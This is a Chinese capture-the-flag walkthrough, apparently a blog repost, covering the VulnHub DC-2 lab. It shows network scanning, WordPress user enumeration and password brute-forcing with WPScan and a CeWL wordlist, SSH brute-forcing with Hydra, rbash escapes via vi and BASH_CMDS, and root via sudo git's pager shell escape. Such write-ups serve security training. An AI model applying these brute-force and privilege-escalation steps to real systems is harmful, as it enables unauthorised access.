【DC渗透系列DC-2】

这篇具有很好参考价值的文章主要介绍了【DC渗透系列DC-2】。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

arp先扫

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6b:ed:27, IPv4: 192.168.100.251
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1   00:50:56:c0:00:08       VMware, Inc.
192.168.100.2   00:50:56:fc:f2:a6       VMware, Inc.
192.168.100.23  00:0c:29:64:16:07       VMware, Inc.
192.168.100.254 00:50:56:ef:65:1b       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.000 seconds (128.00 hosts/sec). 4 responded

nmap扫

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n -p- 192.168.100.23
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-01 19:32 EST
Nmap scan report for 192.168.100.23
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Did not follow redirect to http://dc-2/
|_http-server-header: Apache/2.4.10 (Debian)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:64:16:07 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.37 ms 192.168.100.23

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds

开了80的http端口和7744的ssh的端口
尝试浏览器访问

Hmm. We’re having trouble finding that site.

We can’t connect to the server at dc-2.

If that address is correct, here are three other things you can try:

    Try again later.
    Check your network connection.
    If you are connected but behind a firewall, check that Firefox has permission to access the Web.

url跳到http://dc-2/

修改hosts文件

/etc/hosts(linux系统)
C:\Windows\System32\drivers\etc\hosts(Windows系统)
【DC渗透系列DC-2】
就好啦
【DC渗透系列DC-2】

找到flag1

【DC渗透系列DC-2】
发现是一个wordpress搭建的网站
【DC渗透系列DC-2】
flag中提示说要登录,找不到flag2就换个号登

dirsearch扫一下登陆界面

【DC渗透系列DC-2】
找到http://dc-2/wp-admin/
【DC渗透系列DC-2】
访问成功
开始爆破
kali密码攻击工具——Cewl使用指南

┌──(root㉿kali)-[~/Desktop]
└─# cewl http://dc-2/ -w /root/Desktop/dict.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

【DC渗透系列DC-2】
专门针对WordPress的工具WPScan

┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url dc-2 -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://dc-2/ [192.168.100.23]
[+] Started: Thu Feb  1 20:12:07 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2024-01-16T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.5
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Feb  1 20:12:10 2024
[+] Requests Done: 74
[+] Cached Requests: 6
[+] Data Sent: 16.619 KB
[+] Data Received: 21.289 MB
[+] Memory used: 177.188 MB
[+] Elapsed time: 00:00:03

扫出三个用户名,放入user.txt

┌──(root㉿kali)-[~/Desktop]
└─# vim user.txt  
                                                                                                                                                 
┌──(root㉿kali)-[~/Desktop]
└─# cat user.txt                               
admin
jerry
tom

开始爆破

┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url dc-2 -U '/root/Desktop/user.txt'  -P '/root/Desktop/dict.txt' 

【DC渗透系列DC-2】

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

jerry登录page里面找到flag2

【DC渗透系列DC-2】
提示我们;另一条路,账号名密码都有,想到前面的7744ssh端口爆破

同DC-9解法,海德拉

┌──(root㉿kali)-[~/Desktop]
└─# hydra -L user.txt -P dict.txt ssh://192.168.100.23:7744 
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-01 20:30:05
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 714 login tries (l:3/p:238), ~45 tries per task
[DATA] attacking ssh://192.168.100.23:7744/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 571 to do in 00:04h, 13 active
[STATUS] 105.67 tries/min, 317 tries in 00:03h, 400 to do in 00:04h, 13 active
[7744][ssh] host: 192.168.100.23   login: tom   password: parturient
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-01 20:36:40

【DC渗透系列DC-2】

ssh尝试连接

ssh登录
使用less和vi可以查看

┌──(root㉿kali)-[~]
└─# ssh tom@192.168.100.23 -p 7744 
The authenticity of host '[192.168.100.23]:7744 ([192.168.100.23]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.100.23]:7744' (ED25519) to the list of known hosts.
tom@192.168.100.23's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ more flag3.txt
-rbash: more: command not found
tom@DC-2:~$ 
tom@DC-2:~$ less flag3.txt

【DC渗透系列DC-2】
受限制shell(rbash-->相当于你的权限很低,很多命令用不了)的原因,命令type,cat,more,vim都无法查看

绕过rbash

法一:使用vi编辑进行绕过
(1)vi 文件名 //文件名自取
(2)输入:set shell=/bin/sh,然后回车
(3)输入:shell
(4)设置环境变量:export PATH=/usr/sbin:/usr/bin:/sbin:/bin
法二:BASH_CMDS设置shell

BASH_CMDS[x]=/bin/bash   #设置了个x变量shell 
x    #相当于执行shell
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

【DC渗透系列DC-2】
【DC渗透系列DC-2】
应该与jerrry有关,转到jerry目录,发现flag4

tom@DC-2:~$ ls
123  denglu  flag3.txt  tom  usr
tom@DC-2:~$ pwd
/home/tom
tom@DC-2:~$ cd ..
tom@DC-2:/home$ ls
jerry  tom
tom@DC-2:/home$ cd jerry
tom@DC-2:/home/jerry$ ls
flag4.txt
tom@DC-2:/home/jerry$ 

【DC渗透系列DC-2】
还是提示git提权了

git提权

先转到jerry,密码前面找过了
【DC渗透系列DC-2】

法一:

sudo -l  //查询可用sudo命令

果然有git

tom@DC-2:/home/jerry$ su jerry
Password: 
jerry@DC-2:~$ 
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$ 

sudo git help config //强制进入交互状态
!/bin/bash  (这里bash也可以换成sh) //打开一个root权限下的shell
jerry@DC-2:~$ sudo git help config //强制进入交互状态
root@DC-2:/home/jerry# 

法二:

sudo git -p help
!/bin/bash  (这里bash也可以换成sh)

flag在root目录下

【DC渗透系列DC-2】
结束!文章来源地址https://www.toymoban.com/news/detail-825220.html

到了这里,关于【DC渗透系列DC-2】的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • vulnhub DC:3.2渗透笔记

    kali ip :192.168.20.130 靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/ 信息收集 扫描靶机ip以及开放端口 开放了80端口访问一下 意思就是需要root权限了 查看Wapplayzer信息如下 使用的Joomla的CMS,使用joomscan(Joomla漏洞扫描器)扫描器扫描 后台登录界面已发现 漏洞攻击 使用searchsploit搜索

    2023年04月24日
    浏览(32)
  • DC-1靶机渗透测试详细教程

    DC-1下载:https://download.vulnhub.com/dc/DC-1.zip 攻击者kali   IP:192.168.1.9 受害者DC-1   IP:192.168.1.8 将DC-1靶机调成和kali同为桥接模式,因为DC-1的账号和密码还不知道,所以不能查看DC-1的IP地址,那么我们将通过kali来扫描到DC-1的IP地址。 1 使用命令 arp-scan -l 列出当前局域网的所有设备

    2024年02月08日
    浏览(30)
  • Vulnhub靶机渗透学习——DC-9

    本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC9 还是老样子只有拿到root权限才可以发现

    2024年02月09日
    浏览(43)
  • DC-1靶机渗透(教程以及思路)

    一:信息搜集 首先第一步就是使用fping来查看靶机的ip 使用命令fping -aqg ip 使用nmap -sS -p-进行扫描 发现开启了4个端口,分别是22,80,111,45186 再使用nmap的-sV扫描详细信息进行扫描,查看版本号判断是否存在漏洞 二:思路 一般来说这样的端口,我会先从80端口开始,看是否存

    2023年04月08日
    浏览(33)
  • DC-6靶机测试渗透详细教程

    1、首先扫描我们要渗透机器的IP 2、 接着我们扫描IP的端口和操作系统  我们扫到目标机的80端口开启了,我们进行查看目标机的80端口。(我做过实验,所以不可以直接访问)因此我们需要进行给靶机的IP和域名进行绑定,然后再进行访问      发现没有任何注入点 3、接着我

    2024年02月17日
    浏览(33)
  • ARP渗透与攻防(二)之断网攻击

    系列文章 ARP渗透与攻防(一)之ARP原理 kali 作为ARP攻击机,IP地址:192.168.110.26 MAC地址:00:0c:29:fc:66:46 win10 作为被攻击方,IP地址:192.168.110.12 MAC地址:1c:69:7a:a4:cf:92 网关(路由器),IP地址:192.168.110.1 MAC地址:e4:3a:6e:35:98:00 需要注意的时,两台主机需要在同一个局域网,并且

    2024年02月04日
    浏览(35)
  • ARP渗透与攻防(七)之Ettercap Dns劫持

    系列文章 ARP渗透与攻防(一)之ARP原理 ARP渗透与攻防(二)之断网攻击 ARP渗透与攻防(三)之流量分析 ARP渗透与攻防(四)之WireShark截获用户数据 ARP渗透与攻防(五)之Ettercap劫持用户流量 ARP渗透与攻防(六)之限制网速攻击 1.概念 DNS是Domain Name System的缩写, 我们称之域名系统。首先它是

    2024年02月05日
    浏览(70)
  • ARP渗透与攻防(五)之Ettercap劫持用户流量

    系列文章 ARP渗透与攻防(一)之ARP原理 ARP渗透与攻防(二)之断网攻击 ARP渗透与攻防(三)之流量分析 ARP渗透与攻防(四)之WireShark截获用户数据 项目官网:http://ettercap.github.io/ettercap/index.html EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。借助于Etter

    2024年02月02日
    浏览(35)
  • DC系列 DC:2

    IP收集 使用arp-scan 对网段进行扫描 得到目标机ip之后使用nmap -A -p- -sV -sT 10.4.7.21对该ip进行详细扫描 可以看到该目标机开放着ssh和http服务得到端口7744和80 网页收集 访问网页发现无法访问 应该是被重定向到了dc-2这个域名我们做个域名绑定修改本地hosts文件C:WindowsSystem32driv

    2024年02月06日
    浏览(42)
  • esxi 7.0 安装支持 Mellanox Technologies MT26448 [ConnectX EN 10GigE, PCIe 2.0 5GT/s] 驱动支持 最便宜的10GB双光纤网卡

    esxi 7.0 安装支持 Mellanox Technologies MT26448 [ConnectX EN 10GigE, PCIe 2.0 5GT/s] 驱动支持 最便宜的10GB双光纤网卡     最近部署了两天esxi7.0 u3的测试服务器,安装测试许可的esxi 7.0,翻箱捣鼓找出来2张 双网口10Gb 光纤pci 网卡,想利用起来,结果安装好系统后,不识别这个网卡信息,找了

    2024年02月03日
    浏览(49)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包